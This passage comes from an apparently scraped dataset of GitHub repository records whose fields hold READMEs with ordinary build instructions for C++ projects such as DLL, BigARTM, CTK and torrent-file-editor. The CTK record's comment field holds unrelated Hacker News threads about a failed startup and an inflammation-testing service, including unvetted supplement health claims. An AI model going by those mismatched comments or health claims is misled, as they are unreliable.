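        // e.g. major=6, minor=1 -> arch=compute_61,code=sm_61
        std::printf("device %d: %s, compute capability %d.%d\n",
                    i, p.name, p.major, p.minor);
    }
    return 0;
}
```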
## 5. Use Drone Simulation Considering Dynamics or Not\nTypical simulations use a dynamic model to calculate the motion of the drone under given commands.\nHowever, this requires continuous iterations to solve a differential equation, which consumes quite a lot of computation.\nWhen launching a swarm of drones, this computation burden may cause significant lag.\nOn the i7 9700KF CPU I use, 15 drones are the upper limit.\nTherefore, for compatibility and scalability purposes, I use a \"[fake_drone](https://github.com/ZJU-FAST-Lab/ego-planner-swarm/tree/master/src/uav_simulator/fake_drone)\" package to convert commands to drone odometry directly by default.\n\nIf you want to use a more realistic quadrotor model, you can un-comment the nodes `quadrotor_simulator_so3` and `so3_control/SO3ControlNodelet` in [simulator.xml](https://github.com/ZJU-FAST-Lab/ego-planner-swarm/blob/master/src/planner/plan_manage/launch/simulator.xml) to enable quadrotor simulation considering dynamics.\nPlease don't forget to comment out the package `poscmd_2_odom` right after the above two nodes.\n\n## 6. Utilize the Full Performance of the CPU\nThe computation time of our planner is too short for the OS to increase the CPU frequency, which makes computation times longer and less stable.\n\nTherefore, we recommend manually setting the CPU frequency to the maximum.\nFirst, install a tool by\n```\nsudo apt install cpufrequtils\n```\nThen you can set the CPU frequency to the maximum allowed by\n```\nsudo cpufreq-set -g performance\n```\nMore information can be found in [http://www.thinkwiki.org/wiki/How_to_use_cpufrequtils](http://www.thinkwiki.org/wiki/How_to_use_cpufrequtils).\n\nNote that the CPU frequency may still decrease due to high temperature under high load.\n\n\n\n# Licence\nThe source code is released under the [GPLv3](http://www.gnu.org/licenses/) license.\n\n# Maintenance\nWe are still working on extending the proposed system and improving code reliability. \n\nFor any technical issues, please contact Xin Zhou (iszhouxin@zju.edu.cn) or Fei GAO (fgaoaa@zju.edu.cn).\n\nFor commercial inquiries, please contact Fei GAO (fgaoaa@zju.edu.cn).\n", "readme_type": "markdown", "hn_comments": "", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "wichtounet/dll", "link": "https://github.com/wichtounet/dll", "tags": ["c-plus-plus", "cpp", "cpp11", "cpp14", "performance", "machine-learning", "deep-learning", "artificial-neural-networks", "gpu", "rbm", "cpu", "convolutional-neural-networks"], "stars": 639, "description": "Fast Deep Learning Library (DLL) for C++ (ANNs, CNNs, RBMs, DBNs...)", "lang": "C++", "repo_lang": "", "readme": "Deep Learning Library (DLL) 1.1\n===============================\n\n|logo| |coverage| |jenkins| |license|\n\n.. |logo| image:: logo_small.png\n.. |coverage| image:: https://img.shields.io/sonar/https/sonar.baptiste-wicht.ch/dll/coverage.svg\n.. |jenkins| image:: https://img.shields.io/jenkins/s/https/jenkins.baptiste-wicht.ch/dll.svg\n.. |license| image:: https://img.shields.io/github/license/mashape/apistatus.svg\n\nDLL is a library that aims to provide a C++ implementation of Restricted\nBoltzmann Machine (RBM) and Deep Belief Network (DBN) and their convolutional\nversions as well. 
It also has support for some more standard neural networks.\n\nFeatures\n--------\n\n* **Restricted Boltzmann Machine**\n\n * Various units: Stochastic binary, Gaussian, Softmax and nRLU units\n * Contrastive Divergence and Persistent Contrastive Divergence\n\n * CD-1 learning by default\n\n * Momentum\n * Weight decay\n * Sparsity target\n * Train as Denoising autoencoder\n\n* **Convolutional Restricted Boltzmann Machine**\n\n * Standard version\n * Version with Probabilistic Max Pooling (Honglak Lee)\n * Binary and Gaussian visible units\n * Binary and ReLU hidden units for the standard version\n * Binary hidden units for the Probabilistic Max Pooling version\n * Training with CD-k or PCD-k (only for standard version)\n * Momentum, Weight Decay, Sparsity Target\n * Train as Denoising autoencoder\n\n* **Deep Belief Network**\n\n * Pretraining with RBMs\n * Fine tuning with Conjugate Gradient\n * Fine tuning with Stochastic Gradient Descent\n * Classification with SVM (libsvm)\n\n* **Convolutional Deep Belief Network**\n\n * Pretraining with CRBMs\n * Classification with SVM (libsvm)\n\n* Input data\n\n * Input data can be either in containers or in iterators\n\n * Even if iterators are supported for the SVM classifier, libsvm will move all\n the data into a memory structure.\n\nBuilding\n--------\n\nNote: When you clone the library, you need to clone the submodules as well,\nusing the --recursive option.\n\nThe folder **include** must be included with the **-I** option, as well as the\n**etl/include** folder.\n\nThis library is completely header-only; there is no need to build it.\n\nHowever, this library makes extensive use of C++11 and C++14, therefore,\na recent compiler is necessary to use it. Currently, this library is only tested\nwith g++ 9.3.0.\n\nIf for some reason it does not work on one of the supported compilers,\ncontact me and I'll fix it. It should work fine on recent versions of clang.\n\nThis has never been tested on Windows. While it should compile on Mingw, I don't\nexpect Visual Studio to be able to compile it for now, although VS 2017 sounds\npromising. If you have problems compiling this library, I'd be glad to help, but\nI cannot guarantee that this will work on other compilers.\n\nIf you want to use the GPU, you should use CUDA 8.0 or later and CUDNN 5.0.1 or\nlater. I haven't tried other versions, but lower versions of CUDA, such as 7,\nshould work, and higher versions as well. If you have issues with different\nversions of CUDA and CUDNN, please open an issue on Github.\n\nLicense\n-------\n\nThis library is distributed under the terms of the MIT license, see `LICENSE`\nfile for details.\n", "readme_type": "rst", "hn_comments": "", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "balloonwj/TeamTalk", "link": "https://github.com/balloonwj/TeamTalk", "tags": [], "stars": 639, "description": "This is the version of the Mushroom Street TeamTalk source code that I maintain.", "lang": "C++", "repo_lang": "", "readme": "TeamTalk is an open source internal instant messaging software from Mushroom Street. It currently supports multiple clients: PC, Android, iOS, Mac and web. 
Here are the code and deployment scripts for each version.\n\nThis is the version of TeamTalk that I maintain.\n\nIf you encounter any problems while using this code, you can contact me through my WeChat public account \"**High Performance Server Development**\" for help, or contact me on WeChat: **easy_coder**.\n\nYou can also report issues on this page: https://github.com/baloonwj/TeamTalk/issues/1\n\nAnother open source IM developed by me - Flamingo:\n\nhttps://github.com/balloonwj/flamingo", "readme_type": "markdown", "hn_comments": "", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "torrent-file-editor/torrent-file-editor", "link": "https://github.com/torrent-file-editor/torrent-file-editor", "tags": ["qt5", "torrent", "qt4"], "stars": 639, "description": "Qt based GUI tool designed to create and edit .torrent files", "lang": "C++", "repo_lang": "", "readme": "[![Build Status](https://travis-ci.org/torrent-file-editor/torrent-file-editor.svg?branch=master)](https://travis-ci.org/torrent-file-editor/torrent-file-editor)\n[![Crowdin](https://d322cqt584bo4o.cloudfront.net/torrent-file-editor/localized.svg)](https://crowdin.com/project/torrent-file-editor)\n[![Version](https://badge.fury.io/gh/torrent-file-editor%2Ftorrent-file-editor.svg)](https://badge.fury.io/gh/torrent-file-editor%2Ftorrent-file-editor)\n\nTorrent File Editor\n===================\n\nQt based GUI tool designed to create and edit .torrent files\n\nAuthor: Ivan Romanov <[drizt72@zoho.eu](mailto:drizt72@zoho.eu)> \nLicense: GNU General Public License v3.0 or later \nHomepage: https://torrent-file-editor.github.io \nSources: https://github.com/torrent-file-editor/torrent-file-editor \nCrowdin translations: https://crowdin.com/project/torrent-file-editor\n\nBuild Instructions\n------------------\n\nNeed to have\n - CMake >= 2.8.11\n - Qt4 or Qt5\n - QJSON >= 0.8.0 if using Qt4\n - [Sparkle](http://sparkle-project.org/) only for Mac OS X\n\n**Linux:**\n\nThe Qt4 version is built by default\n\n mkdir build && cd build\n cmake -DCMAKE_BUILD_TYPE=Release -DQT5_BUILD=OFF ..\n make\n\nIf building the Qt5 version on Ubuntu 18.04+, install the required Qt5LinguistTools from the `qttools5-dev` package.\n\n**Mac OS X:**\n\nOnly the Qt5 version\n\n mkdir build && cd build\n cmake -DCMAKE_BUILD_TYPE=Release ..\n make\n make dmg # to build dmg package\n\n**Windows important note**\n\nOnly the Qt4 version for a while.\nI use Fedora 26 MinGW to build Windows versions. Furthermore, I build\nportable static versions. Any other build way is not tested and may\nnot work. It is on my TODO list.\n\nFedora doesn't have a MinGW QJSON package. 
You need to build your own version.\nIt is easy:\n\n wget https://github.com/flavio/qjson/archive/master.tar.gz -O qjson-master.tar.gz\n tar zxf qjson-master.tar.gz\n mkdir qjson-master/win32\n mkdir qjson-master/win64\n cd qjson-master/win32\n mingw32-cmake -DCMAKE_BUILD_TYPE=Release -DBUILD_SHARED_LIBS=OFF -DQT4_BUILD=ON -DQT_INCLUDE_DIRS_NO_SYSTEM=ON -DQT_USE_IMPORTED_TARGETS=OFF ..\n make\n sudo make install # be careful, it installs qjson to system folders\n cd ../win64\n mingw64-cmake -DCMAKE_BUILD_TYPE=Release -DBUILD_SHARED_LIBS=OFF -DQT4_BUILD=ON -DQT_INCLUDE_DIRS_NO_SYSTEM=ON -DQT_USE_IMPORTED_TARGETS=OFF ..\n make\n sudo make install # be careful, it installs qjson to system folders\n\n**Windows x32:**\n\n mkdir build && cd build\n mingw32-cmake -DCMAKE_BUILD_TYPE=Release ..\n make\n\n**Windows x64:**\n\n mkdir build && cd build\n mingw64-cmake -DCMAKE_BUILD_TYPE=Release ..\n make\n\nHow Can I Help?\n---------------\n\nThe project is translated from English to several languages.\nI would be glad if you added new translations. You can translate the\nproject to your native language with [Crowdin](https://crowdin.com/project/torrent-file-editor).\nIt is not difficult and no special knowledge is required.\nOr you can correct my English. I know it is not good. Anyway, you can\nalways email me at <[drizt72@zoho.eu](mailto:drizt72@zoho.eu)>.\n\nAlso feel free to open an issue on GitHub or send me pull requests.\n\n**Translations**\n\n Afrikaans - Afrikaans \n \u0627\u0644\u0639\u0631\u0628\u064a\u0629 - Arabic \n \u09ac\u09be\u0982\u09b2\u09be - Bengali \n \u7b80\u4f53\u4e2d\u6587 - Chinese Simplified \n \u7e41\u9ad4\u4e2d\u6587 - Chinese Traditional \n \u010ce\u0161tina - Czech \n Nederlands - Dutch \n English - English \n Suomi - Finnish \n Fran\u00e7ais - French \n Deutsch - German \n \u05e2\u05d1\u05e8\u05d9\u05ea\u200e - Hebrew \n Magyar - Hungarian \n Indonesia - Indonesian \n Italiano - Italian \n \u65e5\u672c\u8a9e - Japanese \n \ud55c\uad6d\uc5b4 - Korean \n Polski - Polish \n Portugu\u00eas (Brasil) - Portuguese (Brazil) \n Rom\u00e2n\u0103 - Romanian \n \u0420\u0443\u0441\u0441\u043a\u0438\u0439 - Russian \n Espa\u00f1ol - Spanish \n T\u00fcrk\u00e7e - Turkish \n Ti\u1ebfng Vi\u1ec7t - Vietnamese \n \u0423\u043a\u0440\u0430\u0457\u0301\u043d\u0441\u044c\u043a\u0430 - Ukrainian \n", "readme_type": "markdown", "hn_comments": "", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "bigartm/bigartm", "link": "https://github.com/bigartm/bigartm", "tags": ["topic-modeling", "c-plus-plus", "python", "bigartm", "regularizer", "python-api", "text-mining", "machine-learning", "bigdata"], "stars": 639, "description": "Fast topic modeling platform", "lang": "C++", "repo_lang": "", "readme": "
[BigARTM logo]
\n\nThe state-of-the-art platform for topic modeling.\n\n[![Build Status](https://secure.travis-ci.org/bigartm/bigartm.png)](https://travis-ci.org/bigartm/bigartm)\n[![Windows Build Status](https://ci.appveyor.com/api/projects/status/i18k840shuhr2jtk/branch/master?svg=true)](https://ci.appveyor.com/project/bigartm/bigartm)\n[![GitHub license](https://img.shields.io/badge/license-New%20BSD-blue.svg)](https://raw.github.com/bigartm/bigartm/master/LICENSE.txt)\n[![DOI](https://zenodo.org/badge/DOI/10.5281/zenodo.288960.svg)](https://doi.org/10.5281/zenodo.288960)\n\n - [Full Documentation](http://docs.bigartm.org/)\n - [User Mailing List](https://groups.google.com/forum/#!forum/bigartm-users)\n - [Download Releases](https://github.com/bigartm/bigartm/releases)\n - [User survey](http://goo.gl/forms/tr5EsPMcL2)\n\n\n# What is BigARTM?\n\nBigARTM is a powerful tool for [topic modeling](https://en.wikipedia.org/wiki/Topic_model) based on a novel technique called Additive Regularization of Topic Models. This technique effectively builds multi-objective models by adding weighted sums of regularizers to the optimization criterion. BigARTM is known to combine very different objectives well, including sparsing, smoothing, topic decorrelation and many others. Such a combination of regularizers significantly improves several quality measures at once, almost without any loss of perplexity.\n\n### References\n\n* Vorontsov K., Frei O., Apishev M., Romov P., Dudarenko M. BigARTM: [Open Source Library for Regularized Multimodal Topic Modeling of Large Collections](https://s3-eu-west-1.amazonaws.com/artm/Voron15aist.pdf) // Analysis of Images, Social Networks and Texts. 2015.\n* Vorontsov K., Frei O., Apishev M., Romov P., Dudarenko M., Yanina A. [Non-Bayesian Additive Regularization for Multimodal Topic Modeling of Large Collections](https://s3-eu-west-1.amazonaws.com/artm/Voron15cikm-tm.pdf) // Proceedings of the 2015 Workshop on Topic Models: Post-Processing and Applications, October 19, 2015 - pp. 29-37.\n* Vorontsov K., Potapenko A., Plavin A. [Additive Regularization of Topic Models for Topic Selection and Sparse Factorization.](https://s3-eu-west-1.amazonaws.com/artm/voron15slds.pdf) // Statistical Learning and Data Sciences. 2015 \u2014 pp. 193-202.\n* Vorontsov K. V., Potapenko A. A. 
[Additive Regularization of Topic Models](https://s3-eu-west-1.amazonaws.com/artm/voron-potap14artm-eng.pdf) // Machine Learning Journal, Special Issue \u201cData Analysis and Intelligent Optimization\u201d, Springer, 2014.\n* More publications can be found on our [wiki page](https://github.com/bigartm/bigartm/wiki/Publications).\n\n### Related Software Packages\n\n- [TopicNet](https://github.com/machine-intelligence-laboratory/TopicNet/) is a high-level interface for BigARTM which is helpful for rapid solution prototyping and for exploring the topics of finished ARTM models.\n- [David Blei's List](http://www.cs.columbia.edu/~blei/topicmodeling_software.html) of Open Source topic modeling software\n- [MALLET](http://mallet.cs.umass.edu/topics.php): Java-based toolkit for language processing with a topic modeling package\n- [Gensim](https://radimrehurek.com/gensim/): Python topic modeling library\n- [Vowpal Wabbit](https://github.com/JohnLangford/vowpal_wabbit) has an implementation of the [Online-LDA algorithm](https://github.com/JohnLangford/vowpal_wabbit/wiki/Latent-Dirichlet-Allocation)\n\n\n# Installation\n### Installing with pip (Linux only)\n\nWe have a PyPi release for Linux:\n```bash\n$ pip install bigartm\n```\nor \n```bash\n$ pip install bigartm10\n```\n\n### Installing on Windows\nWe suggest [using pre-built binaries](https://bigartm.readthedocs.io/en/master/installation/windows.html).\n\nIt is also possible to [compile the C++ code on Windows](https://bigartm.readthedocs.io/en/master/devguide/dev_build_windows.html) if you want the latest development version.\n\n### Installing on Linux / MacOS\nDownload a [binary release](https://github.com/bigartm/bigartm/releases) or build from source using cmake:\n```bash\n$ mkdir build && cd build\n$ cmake ..\n$ make install\n```\n\nSee [here](https://bigartm.readthedocs.io/en/master/installation/linux.html) for detailed instructions.\n\n# How to Use\n\n### Command-line interface\n\nCheck out the [documentation for `bigartm`](http://docs.bigartm.org/en/latest/tutorials/bigartm_cli.html).\n\nExamples:\n\n* Basic model (20 topics, output to a CSV file, inferred in 10 passes)\n\n```bash\nbigartm.exe -d docword.kos.txt -v vocab.kos.txt --write-model-readable model.txt\n--passes 10 --batch-size 50 --topics 20\n```\n\n* Basic model with fewer tokens (filtered extreme values based on token frequency)\n```bash\nbigartm.exe -d docword.kos.txt -v vocab.kos.txt --dictionary-max-df 50% --dictionary-min-df 2\n--passes 10 --batch-size 50 --topics 20 --write-model-readable model.txt\n```\n\n* Simple regularized model (increase sparsity up to 60-70%)\n```bash\nbigartm.exe -d docword.kos.txt -v vocab.kos.txt --dictionary-max-df 50% --dictionary-min-df 2\n--passes 10 --batch-size 50 --topics 20 --write-model-readable model.txt \n--regularizer \"0.05 SparsePhi\" \"0.05 SparseTheta\"\n```\n\n* More advanced regularized model, with 10 sparse objective topics and 2 smooth background topics\n```bash\nbigartm.exe -d docword.kos.txt -v vocab.kos.txt --dictionary-max-df 50% --dictionary-min-df 2\n--passes 10 --batch-size 50 --topics obj:10;background:2 --write-model-readable model.txt\n--regularizer \"0.05 SparsePhi #obj\"\n--regularizer \"0.05 SparseTheta #obj\"\n--regularizer \"0.25 SmoothPhi #background\"\n--regularizer \"0.25 SmoothTheta #background\" \n```\n\n### Interactive Python interface\n\nBigARTM provides a full-featured and clear Python API (see [Installation](http://docs.bigartm.org/en/latest/installation/index.html) to configure the Python API for your 
OS).\n\nExample:\n\n```python\nimport artm\n\n# Prepare data\n# Case 1: data in CountVectorizer format\nfrom sklearn.feature_extraction.text import CountVectorizer\nfrom sklearn.datasets import fetch_20newsgroups\nfrom numpy import array\n\ncv = CountVectorizer(max_features=1000, stop_words='english')\nn_wd = array(cv.fit_transform(fetch_20newsgroups().data).todense()).T\nvocabulary = cv.get_feature_names()\n\nbv = artm.BatchVectorizer(data_format='bow_n_wd',\n n_wd=n_wd,\n vocabulary=vocabulary)\n\n# Case 2: data in UCI format (https://archive.ics.uci.edu/ml/datasets/Bag+of+Words)\nbv = artm.BatchVectorizer(data_format='bow_uci',\n collection_name='kos',\n target_folder='kos_batches')\n\n# Learn simple LDA model (or you can use advanced artm.ARTM)\nmodel = artm.LDA(num_topics=15, dictionary=bv.dictionary)\nmodel.fit_offline(bv, num_collection_passes=20)\n\n# Print results\nmodel.get_top_tokens()\n```\n\nRefer to the [tutorials](http://docs.bigartm.org/en/latest/tutorials/python_tutorial.html) for details on how to start using BigARTM from Python; the [user's guide](http://docs.bigartm.org/en/latest/tutorials/python_userguide/index.html) provides information about more advanced features and cases.\n\n### Low-level API\n\n - [C++ Interface](http://docs.bigartm.org/en/latest/api_references/cpp_interface.html)\n - [Plain C Interface](http://docs.bigartm.org/en/latest/api_references/c_interface.html)\n\n\n## Contributing\n\nRefer to the [Developer's Guide](http://docs.bigartm.org/en/latest/devguide.html) and follow the [Code Style](https://github.com/bigartm/bigartm/wiki/Code-style).\n\nTo report a bug, use the [issue tracker](https://github.com/bigartm/bigartm/issues). To ask a question, use [our mailing list](https://groups.google.com/forum/#!forum/bigartm-users). Feel free to make a [pull request](https://github.com/bigartm/bigartm/pulls).\n\n\n## License\n\nBigARTM is released under the [New BSD License](https://raw.github.com/bigartm/bigartm/master/LICENSE) that allows unlimited redistribution for any purpose (even for commercial use) as long as its copyright notices and the license\u2019s disclaimers of warranty are maintained.\n", "readme_type": "markdown", "hn_comments": "", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "commontk/CTK", "link": "https://github.com/commontk/CTK", "tags": ["c-plus-plus", "qt", "medical-imaging", "python", "vtk", "itk", "dicom", "plugin-manager", "osgi", "3d-slicer", "mitk", "open-source", "cross-platform"], "stars": 639, "description": "A set of common support code for medical imaging, surgical navigation, and related purposes.", "lang": "C++", "repo_lang": "", "readme": "Common Toolkit\r\n==============\r\n\r\n.. image:: https://circleci.com/gh/commontk/CTK.png?style=shield\r\n :target: https://circleci.com/gh/commontk/CTK\r\n\r\nThe Common Toolkit is a community effort to provide support code for medical image analysis,\r\nsurgical navigation, and related projects.\r\n\r\nSee http://commontk.org\r\n\r\nBuild Instructions\r\n==================\r\n\r\nConfigure the project using CMake.\r\n\r\nFor Qt5, specify the following:\r\n - ``CTK_QT_VERSION``: 5\r\n - ``QT5_DIR``: C:\\Qt\\5.15.0\\msvc2019_64\\lib\\cmake\\Qt5 (or something similar, depending on operating system)\r\n - ``VTK_MODULE_ENABLE_VTK_GUISupportQt``: YES (for enabling VTK widgets)\r\n - ``VTK_MODULE_ENABLE_VTK_ViewsQt``: YES (for enabling VTK view widgets)\r\n\r\nNote: make sure your build toolchain version is compatible with the chosen Qt version. 
For example if trying to build with Qt-5.12 and Microsoft Visual Studio 2019, then build will fail with the error `error LNK2019: unresolved external symbol \"__declspec(dllimport) public: __cdecl QLinkedListData::QLinkedListData(void)\"`. The solution is to either change the toolset version to an earlier one (e.g., Visual Studio 2017) or upgrade Qt (e.g., use Qt-5.15 with Visual Studio 2019).\r\n", "readme_type": "rst", "hn_comments": "I\u2019m sorry that happened - that was hard to read :(In my opinion, in ANY relationship if someone demands full control of all communication, then they are trying to hide something.It's good general advice, though every tip of course has many counterexamples. I think the reality is startups are hard and also require luck.Your mistake is classic, you didn't have a product, then released a pile of shit and failed.Build a solid working product before anything else, and get to at least parity with your 'competition' before releasing, and obviously test it.It\u2019s not clear how this 200k was spent. In terms of team composition, age of your startup.So some more context would be nice.Ok, but how do I get the $200k to begin with? ;)I don't have the experience you have so I don't know what I can add but I am a laborer. You are blaming your team here but a lot of what you are discussing are strategic errors. How is your team responsible? Their code was just very buggy and you trusted it to work?It would be nice to know how you actually lost it, before diving into advice.> 1. Do not trust people blindly, especially your team.This was the number mistake my cofounder Oscar, and I made. We trusted our team blindly.Care to elaborate?[dead]> We trusted our team blindly.What happened?It is good advice. Not fully agree with 5 tough. You need both, stability and UX. Cemeteries are full of stable products that were hard to use.Not to dismiss your points, but if you are going to title the post \u201cI lost 200k\u201d it\u2019d be nice to at least explain where the money went. Was it routine operating expenses that ultimately went to fund a failed product, or something more nefarious (#1 hints at that).> Today, I am sharing the learning lessons so that you do not make the mistakes I made.> 1. Do not trust people blindly, especially your team.> This was the number mistake my cofounder Oscar, and I made. We trusted our team blindly.Your number-one mistake was trusting your team?That sounds like it could be finger-pointing downwards by a leader, so you might want to expound, or reconsider.For example, even if the entire startup team turned out to be dishonest and incompetent, weren't those clowns were hired and led by the founders? If so, the buck might stop with the founders, so maybe there's a better way to characterize and learn from the failure.Our startup import export business lost about $5MM in one transaction over Covid when the Vietnamese mafia / corrupt factory decided to say YOLO and keep our cash.Still haven\u2019t recovered anything.I'm interested in \"build an audience before building a product\" - classically you would determine a target market/niche, build an MVP, and then attempt to market it, refine it with early customers. What kind of audience and conversations can you have without _any_ product? I've seen more than one startup fail by investing into marketing without having anything to market ready. But I'm curious in other experiences.Everything here could be wrong or right depending on your individual situation.No two companies are the same. 
Take advice (or insight) with a grain of salt.All great advice, but maybe a bit overindexing and fighting the last war?There's not enough detail on what happened, the product, market, etc. to get anything out of this. I fell for the clickbait title but was just confusedFor context, this one was about an email marketing tool.Sorry to hear about that. We also bootstrapped our product and put about $60k in it. We built a product within a week and went out to sell. Having a technical founder(that doesn't take salary + someone you have known for years)is important. I understand the stress. Don't let them bring you down. You will come back stronger.How many did you hire?I like #7 very much. One should talk a lot about your concept before building it. Don\u2019t worry about anyone stealing your idea.tl;dr: The author is sharing lessons learned from their experience building and launching a product. They advise against building an all-in-one tool and recommend testing and selling to at least 1,000 paying users before building more. They also suggest following a systematic launch cycle and validating ideas with paying customers before building. They also advise building an audience before building a product, splitting large visions into smaller projects, and focusing on the most requested feature by buyers in the early stages. They mention mistakes they made, including blindly trusting their team, which led to delays and stability issues, and ultimately, a loss of over $200,000 and depression. They also suggest the importance of QA during the early stage.Good bot yes yes, I'm working on a news summary thingo for myself and this was in my open tabs.> We trusted our team blindly.What did you trust them to do?I feel like I hear this sentiment fairly often in the context of startup mistakes, and I wonder if people simply have unrealistic expectations.Developers write software, and they usually aren\u2019t magicians. They can\u2019t always turn poor instructions or bad ideas into world class software.I\u2019ve worked on teams where the software we were building simply wasn\u2019t great. It would never be great without some degree of pivoting and addressing a market more appropriately with better solutions. This was never a developer\u2019s fault, though. In fact the team could be killing in terms of getting the work done that they were asked to. Even so it often came down on the software team to do better somehow. Numbers aren\u2019t right, we need to optimize. We need to do the thing faster. Joey spent two weeks doing X, that should never happen!But even if Joey did X in two minutes, customers still wouldn\u2019t be very excited. Organic growth would remain poor. Trials would not convert very well.Some developers have a good enough sense of the bigger picture, business, marketing, their own trade, etc. and they can provide feedback and insight that\u2019ll potentially help change course. This is rarely true or even sufficient in my experience. Developers are only one of the cogs in the software machine.Did you team lie about their abilities? Did they falsely report hours worked? 
I\u2019m really curious where your trust went and how you were let down.Should be \u201eTell hn\u201c, also you might want to change the title to something including \u201eStartup\u201c and \u201elessons learned\u201c, then it might track better!https://www.tubebuddy.com/clickmagnetThis is the link to their site, if anyone has any information I'd love to hear it![1] https://www.nature.com/articles/s41591-019-0675-0, plus sources on this page: https://www.begolden.online/post/lifestyle-interventions-ass...[2] See the Nature article in [1] plus sources on this page: https://www.begolden.online/post/scientific-articles-on-the-...).[3] https://pubmed.ncbi.nlm.nih.gov/19223918/,https://academic.o..., https://pubmed.ncbi.nlm.nih.gov/17909397/[4] https://www.sciencedirect.com/topics/neuroscience/c-reactive..., https://www.nejm.org/doi/full/10.1056/nejm200003233421202, https://www.clevelandheartlab.com/wp-content/uploads/2020/04...[5] https://www.health.harvard.edu/staying-healthy/understanding...[6] https://www.nature.com/articles/s41591-019-0675-0, https://www.clinicaltherapeutics.com/article/S0149-2918%2819...[7] https://www.nature.com/articles/s41591-019-0675-0, https://www.health.harvard.edu/staying-healthy/understanding...[8] https://www.ncbi.nlm.nih.gov/pmc/articles/PMC4369762/[9] https://www.ncbi.nlm.nih.gov/pmc/articles/PMC6831096/ ,https://www.mdpi.com/1422-0067/22/11/5421/htm, https://www.nature.com/articles/s41591-019-0675-0, https://www.cell.com/fulltext/S0092-8674(10)00060-7[10] https://www.nature.com/articles/s41392-021-00658-5, https://www.ncbi.nlm.nih.gov/pmc/articles/PMC6831096/, https://www.mdpi.com/1422-0067/22/11/5421/htm[11] https://www.nature.com/articles/s41392-021-00658-5The concept of quantifying inflammation is definitely interesting - best of luck and excited to see how this plays out!Can you ship to and from Europe?This sounds like you're doing research. You're trying to gather data on daily habits and interventions taken by subjects and then looking at the impact on their blood marker levels. That is normally something that would happen in a randomized controlled trial or possibly epidemiological retrospective if you're doing pure data mining, and the research subjects would at worst be volunteers, but might even be paid. This feels like you're asking research subjects to pay to be research subjects so they can take your treatments that you don't yet have evidence for.I don't mean to sound like I'm impugning your ethics, but why are you doing this as a startup and not a research proposal? Is it normal for YCombinator to fund medical research?Well it looks nice and shiny! But I'm afraid it's absolutely a revamp of uBiome. This sort of remote diagnosis simply can't be done to any degree of accuracy with a single pinprick blood sample. You need a significant program of investigation before you can start trying to isolate what you're looking for. Diagnosis of this type is incredibly complicated because there are so many variables - internal and external - involved.And at those astronomical costs, the customer will go bust long before any meaningful results/benefits acrue. Not trying to be rude, but this is one of those projects which looks fantastic on a marketing slide deck, but in practice it's woefully inadequate. My only suggestion would be to pivot to a much more focused niche as soon as you can. One which can be reliable with minimal inputs.I recently also developed an App to help me figure out my IBS and digestion problems. 
Basically i looked at all the apps in the app store but did not found a simple to use app. Inserting your meals should really be as simple as it possibly can, otherwise you will end up not using it at all.If anyone is interested, it is currently available in the google app store. Apple coming soon. Foodolyst:\nhttps://play.google.com/store/apps/details?id=studio.creatne...Also available as a webapp: https://app.foodolyst.creatness.studioThe app works in German&English. I haven't proof read every English entry however, so feedback is very much welcomed. I can return lifetime premium access in return :)Okay enough advertising, sorry but the topic is quite interesting and everyone with food problems can just benefit from this.Interesting approach, thanks for the good reads. Would love to support, no strings attached, if you see an opportunity. Reached out on LI, feel free to dump the request if this feels off to you.Congrats on launching!Compliments first - you described your elevator pitch of the company incredibly well in the starter post here on HN, to the point I'd use that as a template on your site and any kind of social media materials. Fantastic way to explain what the isasue is and how you're tackling it in a novel but practical way.My immediate thought is \"cool idea, but a non starter for me personally when I have a lot of questions about data and privacy\" and how the team's handling patient's data. I'd highly encourage you to have a whole page at minimum elucidating the details there, if you're using E2E encryption, all that jazz. Given people's recent concerns about data collecting and menstrual cycles and the recent Roe fallout, this is of special concern to me as a woman.Wishing you and the team best of luck, all the same!Congrats on the launch! Interested to know if my inflammation score will be aWhy do you test for hsCRP and not CRP?What exactly can I learn from my hsCRP values?\nWhat can I learn from hsCRP that I can't learn from CRP?hsCRP is a very sensitive marker.\nIf I'd exercise the day before the test and my values would be elevated?\nWhat would I learn from my result in this case?Will your provide explanations of what influences my individual hsCRP levels and what specific interventions I should take in case they are elevated?What is your process if you detect abnormally high hsCRP values?\nHow do you alert your customers of their possibly lethal condition?How does your service provide value to me as a customer apart from me not needing to go to a lab/doctor to get tested?Anyways, I don't see much value in getting just hsCRP tested standalone without any other meaningful context.\nWhat about my iron levels? Vitamins? Lipid profile? IgG, IgA? HBa1c. On and on it goes.\nThere is a reason that medical doctors collect a host of lab data to make informed decisions about their patients health and which possible interventions induce postive change without interdicting harmful side effects.Very interesting. I remember seeing data in the early days of Covid that CRP was quite correlated with severityCool! A couple suggestions:1 - the CSS is all over the place on mobile, it looks pretty bad.2 - maybe adjust the pricing of the bulk a bit. I assume you want to sell the bulk packs more, so incentivize them more.Instead of $74 for 1 / $69 for 2, make it like $79 for 1 and $64 for 2, and make sure you say that\u2019s \u201csaving $30\u201d. 
Right now it feels like it\u2019s only $5 off which doesn\u2019t convince me (yes I know it\u2019s $10 actually).I've noticed that my C Reactive Protein were always high when I was taking creatine and doing strength training and wasn't sure which was the culprit. Likely both. Is there a way to account or correct for high hsCRP related to exercise or is the recommendation to do less intense exercise?I am a very inflammable (inflammed? not sure the terminology) person - allergic to pretty much everything, ezcema, IBS.I've been to specialist doctors for all these things and they've mostly basically told me to go fuck myself (\"You have IBS, can't help you there. Be grateful it's not cancer. Next patient!\")Anyways, the finger prick thing kind of intimidates me but I think this is exactly what I need!Can I recommend an additional intervention to look into?https://en.m.wikipedia.org/wiki/Diosmin \u2014 a chemical relative of hesperidin (a blood thinner like curcumin), but not itself a blood thinner \u2014 rather, diosmin affects lymphatic channel contractile tone in about the same way that hesperidin affects blood-vessel contractile tone. I.e. it makes your body better at pumping lymph.Currently used by many for treatment of chronic veinous insufficiency (\u201cspider veins\u201d), as a side-effect of improved lymph flow is lower peripheral static pressure in cases of low veinous return rate. Also treats peripheral oedema, for similar reason. But that\u2019s just a side-effect.More interesting direct effect: it expedited wound healing (waste clearance from wound site), and decreases wound scarring. I.e. it makes your body do the thing it relies on your lymphatic system to do, faster and better. (Tattoos fade faster, even.)Consequently, diosmin is the active ingredient of a an oral OTC anti-hemorrhoid drug. Because, by improving wound healing + lowering scarring enough, your body can clear wastes/senescent 